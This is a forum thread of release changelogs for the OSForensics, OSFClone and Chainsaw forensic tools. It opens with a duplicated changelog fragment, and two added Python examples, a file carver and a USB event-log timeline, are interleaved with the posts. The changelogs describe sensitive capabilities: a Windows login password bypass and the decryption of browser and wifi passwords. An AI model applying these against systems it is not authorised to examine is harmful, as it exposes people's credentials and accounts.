    Background LED indicator fixed, indicator would incorrectly reset after "Saving Delete File to Disk" while scan is running.
    File carving, optimization, improved efficiency of pattern matching code. This change roughly doubles the speed of file carving.
    File carving, optimization, updated extensions with header signature. Changed empty buffer detection to faster implementation to detect empty or repeating blocks read from disk. Scanning empty sectors is now 6 times faster
    File carving, optimization, improved the responsiveness for OSForensics when carving is running
    File carving, optimization, increased the number of carving threads to 75% of available logical processors, up to a max of 32
    File carving, improved carving of HTML files
    File carving, reduced false positives for FLV files
    File carving, changed the naming of file to be more informative, new format "Carved .JPG file found at 310GB - byte offset 0x482D709C00.jpg"
    File carving, better handling of .eml files (will verify that both "From:" and "Date:" fields are present)
    File carving, reduced repeated carving for file signatures with the same headers (e.g. TIFF family, ZIP family).
    File carving, ensure recovered carved file will not exceed the max file size specified by extension (or 100 MB, whichever is less)
    Opening internal viewer for Plist Files from within the deleted files module should now work
    Further optimizations to file carving. Improved accuracy for JPG files and overall performance. Compared to the final V9 release, the current file carving code is over 6x faster (benchmarked with a Mac E01 disk image with default carving config)

    Device Manager:

    Scan up to a maximum number of sectors when looking for recovered partitions. This prevents unbounded scanning of disks with a large amount of unpartitioned space

    Disk Image and Filesystem Support:

    HFS+, preliminary support for compressed files
    HFS+, fixed bug in decompressing zlib-compressed file data
    HFS+, support for reading lzvn-compressed file data stored in resource fork
    APFS, fixed bug causing buffer overflow when reading extended attributes (e.g. compressed files)
    APFS, fixed reading compressed file data for files with hard links
    APFS, fixed bug in decompressing zlib-compressed file data

http://www.osforensics.com/
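The file-carving rules listed in the Deleted Files section above (minimum sizes for carved JPG/GIF/PNG, the tightened "\x00\x00\x00?ftyp" header, skipping empty or repeating blocks, requiring both "From:" and "Date:" in a carved .eml, and the "Carved .JPG file found at ... - byte offset ..." naming) come together in this added Python example. It is not OSForensics code; the sector size, per-type size caps, footer handling and the constructed sample image are assumptions made for the demonstration.

```python
import re
from collections import namedtuple
from dataclasses import dataclass
from typing import Callable, List, Optional

SECTOR = 512     # assumption: granularity used for empty/repeating-block skipping
MAX_HEADER = 16  # assumption: longest header pattern, so scan windows overlap by this much


@dataclass(frozen=True)
class Signature:
    ext: str
    header: re.Pattern          # byte pattern that opens the file
    footer: Optional[bytes]     # trailer that closes it; None for footerless formats
    min_size: int               # hits shorter than this are treated as false positives
    max_size: int               # per-extension cap on the carved length (assumption)
    validate: Optional[Callable[[bytes], bool]] = None


CarvedFile = namedtuple("CarvedFile", "ext offset size name")


def eml_looks_valid(data: bytes) -> bool:
    """Changelog rule for .eml hits: both a From: and a Date: header must be present."""
    return (re.search(rb"^From: ", data, re.M) is not None
            and re.search(rb"^Date: ", data, re.M) is not None)


# Constructed signature table. JPG/GIF/PNG minimum sizes are the ones the changelog
# states; the mp4 pattern is the tightened "\x00\x00\x00?ftyp" ISO media header.
SIGNATURES = [
    Signature("jpg", re.compile(rb"\xff\xd8\xff"), b"\xff\xd9", 126, 100 << 20),
    Signature("gif", re.compile(rb"GIF8[79]a"), b"\x00;", 43, 100 << 20),
    Signature("png", re.compile(rb"\x89PNG\r\n\x1a\n"), b"IEND\xae\x42\x60\x82", 68, 100 << 20),
    Signature("mp4", re.compile(rb"\x00\x00\x00.ftyp", re.S), None, 16, 100 << 20),
    Signature("eml", re.compile(rb"(?:Return-Path|Received|From): "), None, 32, 100 << 20,
              validate=eml_looks_valid),
]


def is_empty_block(block: bytes) -> bool:
    """Empty or repeating block: every byte identical (all 0x00, all 0xFF, ...)."""
    return len(set(block)) <= 1


def _footerless_end(image: bytes, off: int, max_size: int) -> int:
    """Footerless formats run until the next empty sector, the size cap or end of image."""
    boundary = (off // SECTOR + 1) * SECTOR
    limit = min(len(image), off + max_size)
    while boundary < limit and not is_empty_block(image[boundary:boundary + SECTOR]):
        boundary += SECTOR
    return min(boundary, limit)


def carve_at(image: bytes, off: int, sig: Signature) -> Optional[CarvedFile]:
    """Carve one candidate at off; None means the hit was rejected as a false positive."""
    if sig.footer is None:
        end = _footerless_end(image, off, sig.max_size)
    else:
        limit = min(len(image), off + sig.max_size)
        idx = image.find(sig.footer, off + 4, limit)
        end = idx + len(sig.footer) if idx >= 0 else limit   # no trailer: truncated carve
    data = image[off:end]
    if len(data) < sig.min_size or (sig.validate and not sig.validate(data)):
        return None
    name = f"Carved .{sig.ext.upper()} file found at {off >> 30}GB - byte offset 0x{off:X}.{sig.ext}"
    return CarvedFile(sig.ext, off, len(data), name)


def carve(image: bytes) -> List[CarvedFile]:
    """Scan sector by sector, skipping empty blocks, and carve the earliest header found."""
    found: List[CarvedFile] = []
    pos = 0
    while pos < len(image):
        if is_empty_block(image[pos:pos + SECTOR]):
            pos += SECTOR                 # no pattern matching on empty/repeating sectors
            continue
        window_end = min(len(image), pos + SECTOR + MAX_HEADER)
        hits = [(m.start(), s) for s in SIGNATURES if (m := s.header.search(image, pos, window_end))]
        if not hits:
            pos += SECTOR
            continue
        off, sig = min(hits, key=lambda h: h[0])
        carved = carve_at(image, off, sig)
        if carved is None:
            pos = off + 1                 # rejected: resume scanning just past the header
            continue
        found.append(carved)
        pos = off + carved.size           # never re-carve inside an accepted file
    return found


def build_sample_image() -> bytes:
    """Constructed 12-sector test image (not real evidence): one file or decoy per sector."""
    def sector(payload: bytes = b"", fill: bytes = b"\x00") -> bytes:
        return payload + fill * (SECTOR - len(payload))
    jpg = b"\xff\xd8\xff\xe0JFIF\x00" + b"A" * 200 + b"\xff\xd9"         # 211 bytes, accepted
    tiny_jpg = b"\xff\xd8\xff\xe0\xff\xd9"                                # 6 bytes, below minimum
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 60 + b"IEND\xae\x42\x60\x82"   # 76 bytes
    gif = b"GIF89a" + b"G" * 36 + b"\x00;"                                # 44 bytes
    mp4 = b"\x00\x00\x00\x18ftypisom"                                      # footerless, runs to next empty sector
    eml = (b"Return-Path: <a@example.invalid>\nFrom: a@example.invalid\n"
           b"Date: Mon, 1 Jan 2024 00:00:00 +0000\nSubject: hi\n\nbody\n")
    decoy = b"From: nobody\nSubject: looks like mail but has no Date header\n"
    return b"".join([sector(), sector(jpg), sector(tiny_jpg), sector(fill=b"\xff"),
                     sector(png), sector(gif), sector(mp4), sector(),
                     sector(eml), sector(), sector(decoy), sector()])
```

Running `carve(build_sample_image())` returns five files (jpg, png, gif, mp4, eml) and silently drops the 6-byte JPG and the decoy text that has a "From:" line but no "Date:" line.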
Title: OSForensics 10.0.1000
Post by: SiLæncer on 14 July, 2022, 13:00
Changelog

       
    Auto Triage
        Added option to enable running auto triage automatically on startup, which can be enabled in the Install to USB dialog and uses the settings last set
        Added splash screen and progress bar when running auto triage as a standalone option
    Analyze Shadow Copy
        Added ability to find shadow copies from analyze dialog without adding to case first
    Boot VM
        Will now display a proper error message when booting from VirtualBox failed (e.g. when Intel VT-x/AMD-V is not enabled)
        Added check for whether VirtualBox extension pack is installed if USB 2.0 or USB 3.0 controller is selected
        Added check and display error for partition-only images without a supported OS before mounting as physical disk
        Added support for password bypass for Win 10/Server 2016 Builds 17763 and 19041 (via PEPassPass v1.2.3)
    Case Manager
        Support for adding recovered partitions to case
        Added ability to save and load custom templates for evidence categories
        Added ability to rename case devices after they have been added
        Add Device, changed the default display name to include the date the shadow copy was taken
        Added time zone names to time zone drop down and case report
        Report Generation, separated the HTML and PDF report options into different templates, no longer need to generate a HTML report to get a PDF copy
        Report Generation, added the details of OSForensics digital signature to generated reports
        Report Generation, updated "Link to case files" and "Copy files to report location" options to "Create Redacted Report" and "Create Full Length Report" to be more descriptive
        Report Generation, added ability to toggle the inclusion of signature certificate verification information in report generation dialog
        Report Generation, Added "Software Verification" link in report sidebar
        Report Generation, Added certificate verification information to non HTML reports
    Clipboard Viewer / ThumbCache Viewer
        Will now draw checkerboard background for improved display of transparent images
        Improved drawing of images to reduce flickering
    Deleted Files
        File carving, optimization. Improved accuracy for JPG files and overall performance. Compared to the final V9 release, the current file carving code is over 6x faster (benchmarked with a Mac E01 disk image with default carving config)
        File carving, optimization, updated extensions with header signature ????ftyp to \x00\x00\x00?ftyp instead. Changed empty buffer detection to faster implementation to detect empty or repeating blocks read from disk. Scanning empty sectors is now 6 times faster
        File carving, optimization, improved efficiency of pattern matching code. This change roughly doubles the speed of file carving
        File carving, optimization, improved the responsiveness for OSForensics when carving is running
        File carving, optimization, increased the number of carving threads to 75% of available logical processors, up to a max of 32
        For FAT and NTFS file systems, added option to carve only Allocated sectors
        Updated to allow selecting of carving of MFT Only, MFT and Carving, or Carving Only
        MFT and Carving now enabled by default
        Added minimum size requirement for carved JPGs (126 bytes), GIFs (43 Bytes), PNGs (68 bytes)
        Changed name Plist to Binary Plist and improved detection to limit false positives
        File carving, fixed possible crash when carving MP3 files
        File carving, improved MP3/JPG detection to cut down on the number of false positive results returned
        Added secondary sorting on second column (via dropdown and/or control click on details tab)
        Disabled sorting while deleted file scan is in progress
        Lowered priority level of carving threads to improve response from computer when carving is in progress
        Thumbnail Tab, added a quality level indicator to the thumbnails preview
        Added support for carving MFT file records on non-NTFS quick formatted volumes
        Added support for recovering files from carved MFT records. This enables recovery of files from a quick-formatted volume
        Added new scan method to config window, changed dropdown box to checkboxes
        Prepend "Carved MFT" to 'Source String' of files recovered from carved MFT records to differentiate from normal deleted files
        Added check for large buffer sizes before allocating memory when detecting faces
        Background LED indicator fixed, indicator would incorrectly reset after "Saving Delete File to Disk" while scan is running
        File carving, improved carving of HTML files
        File carving, reduced false positives for FLV files
        File carving, changed the naming of file to be more informative, new format "Carved .JPG file found at 310GB - byte offset 0x482D709C00.jpg"
        File carving, better handling of .eml files (will verify that both "From:" and "Date:" fields are present)
        File carving, reduced repeated carving for file signatures with the same headers (e.g. TIFF family, ZIP family)
        File carving, ensure recovered carved file will not exceed the max file size specified by extension (or 100 MB, whichever is less)
        Opening internal viewer for Plist Files from within the deleted files module should now work
        NTFS, fixed potential memory issue when restoring deleted files
        NTFS, added more debug verbosity when restoring deleted files to disk
    Device Manager
        Scan up to a maximum number of sectors when looking for recovered partitions. This prevents unbounded scanning of disks with large amounts of unpartitioned space
    Disk Image and Filesystem Support
        HFS+, preliminary support for compressed files
        HFS+, fixed bug in decompressing zlib-compressed file data
        HFS+, support for reading lzvn-compressed file data stored in resource fork
        APFS, fixed bug causing buffer overflow when reading extended attributes (eg. compressed files)
        APFS, fixed reading compressed file data for files with hard links
        APFS, fixed bug in decompressing zlib-compressed file data
        NTFS, fixed bug in incorrect file being opened due to hash collision
    E-mail Viewer
        Message body containing inline content (eg. base64-encoded jpgs) now displayed as attachments
        Thumbnail preview for supported image attachments on mouse over
    ESEDB Viewer
        Viewer now displays when binary data has been found
        Search now looks for ASCII strings present in binary data fields
    Event Log Viewer
        Added "Device Connected/Disconnected" option to the filter preset list
    File Name Search
        Added Hash Set column which identifies which hash set the file was located in
        Fixed $FILE_NAME dates not being displayed for entire disk images added to case
        Added a reset button to config dialog which sets all changes made by user back to their defaults
        Made several popup dialogs close when 'esc' is pressed
        Now using ffmpeg library instead of exiftool for counting video tracks for better performance
    Forensic and Cloud Imaging
        Rebuild RAID Disk, added support for detecting and rebuilding Linux mdadm RAID using superblock v1.X
        Forensics Copy, added ability to export forensic image as zip file
    Internal Viewer
        Perform initialization/shutdown of Media Foundation once rather than for every internal viewer instance
        Fixed issue that prevented deleted files opened from File System Browser from showing in the File Viewer
        Fixed incorrect thumbnail being drawn for current item after the list is updated
        Migrated library for media playback from Windows Media Foundation to ffmpeg
        Added support for playing media from memory buffer sources (eg. deleted files)
        Will now display a specific error message when attempting to open media file with corrupted attributes (duration, video pixel format, etc)
        Fixed flickering from redrawing thumbnails from deleted search result
        Automatically rotate videos if rotation metadata available
        Added a check to only redraw thumbnails if the items changed
        Metadata, display an error message if exiftool executable was not found
        Fixed multithreading bug causing media playback issues when opening multiple instances of the same file
        Fixed video paint issues when resizing window
        Fixed first video frame occasionally being displayed immediately after loading preview thumbnail images
        File viewer support, added opening deleted files (image, video/audio, android backup, compressed archive, office files)
        Added right-click menu support for deleted files
    Install to USB
        Fixed bug, files required by the web browser module were not being copied
    Localisation
        Added localisation support for Korean, Chinese (simplified and traditional), Japanese, Spanish, German and French
    Mismatch File Search
        Separated default and user-created filters, removed "built-in" text
    OSForensics Digital Signature Verification
        Added button to start screen (in housekeeping section) that verifies the integrity of the program and displays a dialog with the information. Equivalent to going to the properties for the OSF executable, going to the digital signatures tab and clicking the details of the signature to verify the digital certificate is valid
    Password Recovery
        Fixed decrypting of wifi passwords on some machines due to a bug in PBKDF2 algorithm
        Updated common passwords dictionary with passwords obtained from more recent data breaches, increased number of unique passwords from ~10,000 to ~2.3 Million
        Fixed password recovery issue with the records in "Windows.old" folder
        Fixed crash in ZIP password recovery when testing a single password
    Search Index
        Fixed GDI handle leak
    SQLite Browser
        New tab to show Unallocated Space (Free Pages/Blocks) within SQLite database file
        Fixed bug to address possible circular reference/offset when parsing corrupted/bad free blocks
        Added Run SQL tab, allows users to write their own SQL statements
        Updated sqlite source files from 3.8.11.1 to V3.38.0
    Start Window
        Added settings option to allow for selecting language in use
    System Information
        Added partition selection dialog when scanning whole disk image with multiple partitions
        Added category for basic system information collection from non Windows machines
    Thumbnail Cache / Viewer
        Attempt to generate video file thumbnails if file extension is a known video type
        Attempt to load thumbnails only if the filename has a known file extension
        Set maximum thumbnail cache size of 2000 to prevent exceeding GDI handle limit
        Fixed multithreaded handling of video thumbnail generation using Media Foundation
        Fixed thumbnail icons not appearing in thumbnail view
        Added check for large buffer sizes before allocating memory for displaying thumbnails
        Migrated library used for video thumbnail generation from Windows Media Foundation to ffmpeg
        Fixed pixelated play icon for video thumbnails
    User Activity
        Added Cortana history category. Finds reminders, events, contacts and search history as well as location at time of creation
        Added "Create Super Timeline" button that performs a complete scan of all activity sub-categories
        USB timeline, added support to collect USB Artifacts of USB storage device connection and disconnection history. This feature is achieved by analyzing event ID 1006 (from Microsoft-Windows-Partition%4Diagnostic.evtx) and event IDs 2003 and 2012 (Microsoft-Windows-DriverFrameworks-UserMode/Operational channel). Event logging of the latter channel is not enabled by default; users / system administrators need to have enabled it in the past in order for OSF to collect the relevant events
        Added parsing for Linux log files located in the /var/log directory
        Passwords, added an option to scan "Windows.old" folder which stores the backups of the previously installed Windows, this option is enabled by default and can be disabled from the Config dialog
        Fixed an issue where Moved Downloads was not recognizing the system drive in live acquisition mode
        Added browser artifact support for some modern versions of Linux
        MRU, shortcut Files, will prompt users if they would like to open the .lnk file itself if the target file/directory is no longer available
        Added warning when attempting to scan a drive image that does not exist
        Shellbag, fixed possible heap corruption crash when parsing (corrupted) URI shell item
        Added check and warning message for missing case device when starting scan
    Web Server Log Viewer
        Added menu for filtering for common web exploits such as SQL injections
    Misc
        Refresh physical disk info only when there is device change notification, to reduce costly re-scanning of physical disks
        Keep single instance of physical disk info shared between all modules
        Fixed bugs with some MessageBoxes opening to wrong handle
        Changed some dialogs to close when 'esc' is pressed and centred others
        Installer, added language selection when running installer
        Rearranged some ok/cancel buttons for consistency, fixed up some out of place buttons/controls
        GPUSupport DLLs, changed the runtime library for them to /MT instead of /MD to avoid a missing VC runtime error on older Windows systems
        Centred some dialogs to main window for consistency
        Help file, updated file carving config info + images
        UI adjustments, centred additional dialogs
        Installer, updated OSFMount to v3.1.1001
        Installer, added Japanese language selection option
        Removed "Selected items" option from the right-click menu for consistency. Affected modules include JSON Viewer, ThumbCache Viewer, Web Server Log Viewer
        Updated DirectIO driver used for system information collection to work with Win11 22H2 release


http://www.osforensics.com/
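As an added example (not OSForensics code), the USB timeline technique described in the 10.0.1000 changelog above, done by hand: event 1006 from Microsoft-Windows-Partition/Diagnostic supplies the disk details, and events 2003/2012 from the DriverFrameworks-UserMode/Operational channel are paired into connect/disconnect sessions per device instance. The one-record-per-line JSON shape, its field names, and the device values are constructed assumptions, not an OSForensics format or real evidence.

```python
import json
from datetime import datetime

# Channels and event IDs named in the OSForensics 10.0.1000 changelog above.
PARTITION_CHANNEL = "Microsoft-Windows-Partition/Diagnostic"
UMDF_CHANNEL = "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
DISK_INFO_ID, CONNECT_ID, DISCONNECT_ID = 1006, 2003, 2012

# Constructed sample records (not real evidence). The one-record-per-line JSON
# shape and the field names (Channel, EventID, TimeCreated, EventData keys) are
# assumptions about a simplified EVTX-to-JSON export, not OSForensics' format.
SAMPLE_RECORDS = r'''
{"Channel": "Microsoft-Windows-Partition/Diagnostic", "EventID": 1006, "TimeCreated": "2022-07-01T08:14:02+00:00", "EventData": {"Manufacturer": "SanDisk", "Model": "Ultra", "SerialNumber": "4C530001230421123456", "Capacity": 32017047552}}
{"Channel": "Microsoft-Windows-DriverFrameworks-UserMode/Operational", "EventID": 2003, "TimeCreated": "2022-07-01T08:14:03+00:00", "EventData": {"InstanceId": "USB\\VID_0781&PID_5581\\4C530001230421123456"}}
{"Channel": "Microsoft-Windows-DriverFrameworks-UserMode/Operational", "EventID": 2012, "TimeCreated": "2022-07-01T08:41:55+00:00", "EventData": {"InstanceId": "USB\\VID_0781&PID_5581\\4C530001230421123456"}}
{"Channel": "Microsoft-Windows-DriverFrameworks-UserMode/Operational", "EventID": 2012, "TimeCreated": "2022-07-01T09:02:10+00:00", "EventData": {"InstanceId": "USB\\VID_0951&PID_1666\\E0D55EA5737F"}}
{"Channel": "Microsoft-Windows-DriverFrameworks-UserMode/Operational", "EventID": 2003, "TimeCreated": "2022-07-01T10:30:00+00:00", "EventData": {"InstanceId": "USB\\VID_0781&PID_5581\\4C530001230421123456"}}
'''


def parse_records(text):
    """Parse one JSON record per line and return them in chronological order."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["TimeCreated"] = datetime.fromisoformat(rec["TimeCreated"])
        records.append(rec)
    return sorted(records, key=lambda r: r["TimeCreated"])


def device_serial(instance_id):
    """Last component of a USB device instance ID: the device serial number, or a
    Windows-generated id (e.g. starting with '7&') when the device reports none."""
    return instance_id.rsplit("\\", 1)[-1]


def build_usb_timeline(records):
    """Pair 2003 (connect) with 2012 (disconnect) events per device instance and
    enrich each session with the 1006 disk details, matched on serial number."""
    disk_info = {}      # serial -> manufacturer/model/capacity from event 1006
    open_sessions = {}  # instance id -> session still waiting for a 2012 event
    sessions = []
    for rec in records:
        channel, event_id, ts = rec["Channel"], rec["EventID"], rec["TimeCreated"]
        data = rec["EventData"]
        if channel == PARTITION_CHANNEL and event_id == DISK_INFO_ID:
            disk_info[data["SerialNumber"]] = {
                "manufacturer": data.get("Manufacturer"),
                "model": data.get("Model"),
                "capacity": data.get("Capacity"),
            }
        elif channel == UMDF_CHANNEL and event_id == CONNECT_ID:
            inst = data["InstanceId"]
            if inst in open_sessions:
                # Second connect with no disconnect in between: the removal was
                # not logged, so close the earlier session with an unknown end.
                sessions.append(open_sessions.pop(inst))
            open_sessions[inst] = {"instance_id": inst, "connected": ts, "disconnected": None}
        elif channel == UMDF_CHANNEL and event_id == DISCONNECT_ID:
            inst = data["InstanceId"]
            session = open_sessions.pop(inst, None)
            if session is None:
                # Disconnect without a matching connect: the connect predates the
                # log (rotation, or the channel was enabled later). Keep it anyway.
                session = {"instance_id": inst, "connected": None, "disconnected": None}
            session["disconnected"] = ts
            sessions.append(session)
    # Devices still attached when the log ends have no disconnect time.
    sessions.extend(open_sessions.values())
    for session in sessions:
        serial = device_serial(session["instance_id"])
        session["serial"] = serial
        session.update(disk_info.get(serial, {"manufacturer": None, "model": None, "capacity": None}))
        if session["connected"] and session["disconnected"]:
            session["duration_s"] = int((session["disconnected"] - session["connected"]).total_seconds())
        else:
            session["duration_s"] = None
    sessions.sort(key=lambda s: s["connected"] or s["disconnected"])
    return sessions


def format_timeline(sessions):
    """Render one line per session, marking the gaps an analyst has to explain."""
    lines = []
    for s in sessions:
        start = s["connected"].isoformat() if s["connected"] else "<before log start>"
        end = s["disconnected"].isoformat() if s["disconnected"] else "<still connected / not logged>"
        desc = f'{s["manufacturer"]} {s["model"]}' if s["model"] else "<no 1006 record>"
        lines.append(f"{start} -> {end}  serial={s['serial']}  {desc}")
    return lines


if __name__ == "__main__":
    for line in format_timeline(build_usb_timeline(parse_records(SAMPLE_RECORDS))):
        print(line)
```

A device that has a 1006 record but no 2003/2012 records at all usually means the DriverFrameworks-UserMode/Operational channel was not enabled on that machine, which is the caveat the changelog entry makes.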
Title: OSForensics 10.0.1001
Posted by: SiLæncer on 22 July, 2022, 09:15
Changelog

    Localisation
        UI adjustments for localisation
        Added some missing strings to localisation
    OSFMount
        Updated OSFMount files to fix driver and program version mismatch
    User Activity
        Increased event info string size to avoid overflow
    Volatility Workbench
        Updated Volatility tool from "3 1.0.1 - beta" to "3 2.0.1"
        Added new volatility commands to volatility workbench


http://www.osforensics.com/
Title: OSForensics 10.0.1002
Posted by: SiLæncer on 05 August, 2022, 13:00
Changelog

    Create / Search Index:

    Fixed crash when saving and loading index configurations

    File System Browser:

    Fixed file entries not appearing in Details/List View in Win 7

    Install to USB:

    Added config link to adjust auto triage options in USB install window

    Localisation:

    Further UI adjustments for localisation

    Start Window:

    Fixed filename bug when opening a file directly from the start window (registry, email, etc) where the filename could be random text or not open correctly

    ThumbCache Viewer:

    Fixed thumbnails not appearing in List View in Win 7


http://www.osforensics.com/
Title: OSForensics 10.0.1003
Posted by: SiLæncer on 09 August, 2022, 19:00
Changelog

    Auto Triage:

    Fixed crash in Auto Triage > Logical Image Configuration when selecting Peer 2 Peer option (pattern string length was too long)
    Fixed crash in Auto Triage > Password recovery

    Password Recovery:

    Fixed windows login passwords not scanning when using live acquisition

    User Activity:

    Fixed bug when trying to re-order columns for USB items that would cause the columns to disappear until OSF was restarted

    User Interface:

    Mitigated window drag lag (effect was more prominent with mice using high polling rates (>300/s))

    Misc:

    Fixed issue with OSF not validating some key.dat files because of extra lines in the file


http://www.osforensics.com/
Title: OSFClone 1.4.1000
Posted by: SiLæncer on 15 September, 2022, 09:04
(https://i.postimg.cc/hG4zpJWz/screenshot-1643.png)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advanced Forensic Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to quickly and efficiently use their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

What's new:

    Updated Porteus Linux to V5.0 (Base Image, Porteus-XFCE-v4.0-x86_64.iso)
    Updated libewf to 20220831 (included libsmdev-20220716)
    Updated afflib to 3.7.19

http://osforensics.com/tools/create-disk-images.html
Title: OSForensics 10.0.1004
Posted by: SiLæncer on 27 September, 2022, 06:30
Changelog

    Case Management:

    Reporting, increased PDF report generation timeout
    Reporting, added a progress window when exporting report as a PDF
    Devices, added support for BDE volumes with a clear key

    Create Index:

    Fixed bug where, if multiple folders/unallocated are added, the indexer fails to run

    Deleted Files:

    Fixed crash when carving MFT records on disks without valid file systems

    Email Viewer:

    Added checkbox option to search for attachment filenames

    Password Recovery:

    Added an error message and retry option if the Chrome local state file was locked (triggered if using Chrome to log into a site or switch profiles at the same time as running a scan in OSF)
    Now clearing file system cache before performing scan. This is to fix issues due to inconsistent data when scanning live system drives in Forensics Mode
    Fixed a failure to decrypt passwords due to unnecessary encoding/decoding operations of the keys when scanning browser passwords. This caused an incorrect AES key and key length to be returned, which caused the failure
    Decryption and Password Recovery, made a change so that the number of available GPUs is not checked until clicking on the tab (previously it would happen at OSF startup and could cause a crash if GPU drivers are out of date)
    Fixed bug where scan was being performed on Live system regardless of which drive was selected

    Rainbow Tables:

    Fixed bug where 'recover passwords' button did not resize properly after recovery is completed/cancelled

    Start Page:

    Added icon and button to display USB write blocking current setting, displayed as "USB Write: Enabled" or "USB Write: Disabled", and can be toggled on and off using this button (current case setting will be changed)

    User Activity:

    Now clearing file system cache before performing scan. This is to fix issues due to inconsistent data when scanning live system drives in Forensics Mode
    Fixed a failure to decrypt passwords due to unnecessary encoding/decoding operations of the keys when scanning browser passwords. This caused an incorrect AES key and key length to be returned, which caused the failure


http://www.osforensics.com/
Title: OSForensics 10.0.1006
Posted by: SiLæncer on 28 November, 2022, 11:00
Changelog

    E-mail Viewer:

    Fixed Ctrl+J jump to message shortcut not working

    Create / Search Index:

    New indexer builds
    Fixed email indexing issue with delimiter character

    Internal Viewer:

    Metadata, allow the user to manually extract EXIF data for large files that need to be saved temporarily on disk
    Ffmpeg, fixed pts-related bug affecting certain video files (eg. mjpeg/Microsoft PCM)
    Images, added file size limit for reading to buffer when using libheif

    Misc:

    Replace file size limit with warning prompt when creating temporary copy of a large file


http://www.osforensics.com/
Title: OSForensics 10.0.1007
Posted by: SiLæncer on 23 January, 2023, 19:00
Changelog

    Boot VM:

    Fixed error booting MacOS image on VirtualBox for some systems
    Added a check to prevent user from adding VM to case if a case is not open

    Case Management:

    Reports, added option to have a minimum font size when exporting report as PDF
    Increased font sizes for better readability when exporting as PDF
    Reports, added checkbox for case report dialog "Include thumbnails" to allow thumbnails to be enabled/disabled. It can be useful to disable thumbnails for reports with thousands of images otherwise they may not open correctly in a web browser

    Deleted Files:

    Fixed possible crash when looking up carved files in hash set

    Email Viewer:

    Fixed bug when exporting PST emails to list. The TO, CC, and BCC fields were not cleared between emails

    Internal Viewer:

    Ffmpeg, fixed ffmpeg library error by re-arranging load order of DLLs (previously could display a “Failed to load library” error at OSForensics start-up)

    Mobile Artifacts:

    Fixed bug with exporting SMS to CSV/Text where Sent/Received field was displaying only received
    Fixed bug with exporting SMS to CSV/Text where selected checked items were not being exported correctly. The export was incorrectly using fixed GUI list position index and not the internal list indexes

    Password Recovery:

    Fixed some possible crashes that could occur

    User Activity:

    Fixed possible crash when scanning MRU


http://www.osforensics.com/
Title: OSForensics 10.0.1008
Posted by: SiLæncer on 22 February, 2023, 10:00
Changelog

    File Carver:

    Fixed possible crash during carving when verifying carved images with GDI

    USB Install:

    Fixed crash when trying to create a USB install with all checkboxes selected

    Misc:

    Fixed ffmpeg library loading warning on machines with Visual C++ Redistributable not installed


http://www.osforensics.com/
Title: OSForensics 10.0.1009
Posted by: SiLæncer on 23 February, 2023, 11:00
What's new:

    Updated WinPEBuilder for ffmpeg support in WinPE
    Fixed signing issue with previous build

http://www.osforensics.com/
Title: OSForensics 10.0.1010
Posted by: SiLæncer on 26 April, 2023, 11:00
Changelog


    Case Manager:

    Fixed tagged files not being saved to the case due to incorrect duplicate file check

    Hash Set:

    Fixed bug with exporting CSV files, category was not being exported in the CSV
    Updated example export output in Help

    Install to USB:

    Fixed bug when Installing OSForensics to USB drive with an old version subscription key, it may wipe the current license from the local install

    Raw Disk Viewer:

    Add support for ext4 64-bit feature

    System Information:

    Fixed crash when “Live Acquisition - Current Machine” is selected for the scan and “Basic System Information” command is selected

    Web Browser:

    Fix bug where OSF may fail to add downloaded video file to case

    Misc

    Updated VolatilityWorkbench to V3.0.1004


http://www.osforensics.com/
Title: OSForensics 10.0.1011
Posted by: SiLæncer on 12 May, 2023, 21:00
Changelog


    ESEDB Viewer:

    Fixed a bug where Windows.edb file could not be loaded from an image file
    Changed the custom Windows.edb file selection behavior to use the Windows.edb file path as the initial directory

    Logical Image - Android Copy:

    Fixed possible crash during imaging due to long file names/extension

    Program Artifacts:

    Fixed parsing of the prefetch files for windows 10 builds 1903 and newer to collect the correct run count

    Report Generation:

    Fixed issue where all 'Exported Files' were added to every 'Category' section
    Enabled hiding of thumbnails for PDF reports
    Fixed issue where options were not disabled for certain report options

    Misc:

    Fixed issue with hover text not displaying properly on toolbar icons (Script Player & SQLite Browser)
    Fixed issue where email files and BitLocker files could not be read in Forensics mode


http://www.osforensics.com/
Title: OSForensics 10.0.1012
Posted by: SiLæncer on 16 May, 2023, 10:00
What's new:

Fixed issue where all 'Photos of Acquired Evidence' were added to every 'Category' section

http://www.osforensics.com/
Title: OSForensics 10.0.1013
Posted by: SiLæncer on 26 May, 2023, 21:00
Changelog


    File Viewer/File Name Search:

    Added MSVCP140.dll and vcruntime140.dll to fix missing system file issue that could happen when opening docx files and filtering on EXIF metadata in some Windows 11 builds

    Manage Case:

    Fixed issue where USB write block was not being enabled/disabled

    Start Page:

    Fixed issue where 'USB Write: Enabled/Disabled' icon text was not updating in custom workflows
    Fixed issue where 'USB Write: Enabled/Disabled' text was written onto the wrong icon


http://www.osforensics.com/
Title: Chainsaw 2.6.2
Posted by: SiLæncer on 03 June, 2023, 09:30
(https://i.postimg.cc/fywgtSMD/screenshot-2299.png)
Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and MFTs. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

License: GPLv3

Changelog


v2.6.2

This release contains the following changes of note:

    Adds array indexing support to key identifiers (tau-engine), which also fixes some chainsaw rules...

v2.6.1

This release contains the following changes of note:

    Fix hunts not running on .jsonl files
    Bring in some false positive reduction for the default Sigma rules mapping file


https://github.com/WithSecureLabs/chainsaw
Title: OSForensics 10.0.1014
Posted by: SiLæncer on 14 June, 2023, 19:00
What's new:

    Create index:

    Added mp4 and mv4 to default video formats
    Fixed detecting UTF-8 text files without a BOM

http://www.osforensics.com/
Title: Chainsaw 2.7.0
Posted by: SiLæncer on 03 July, 2023, 19:30
What's new:

    This release contains the following changes of note:

    Add cache to disk support for JSONL output
    Add file path to CSV output
    Fix for newline output issue in tabular output
    Rule loading warnings should highlight output as a warning
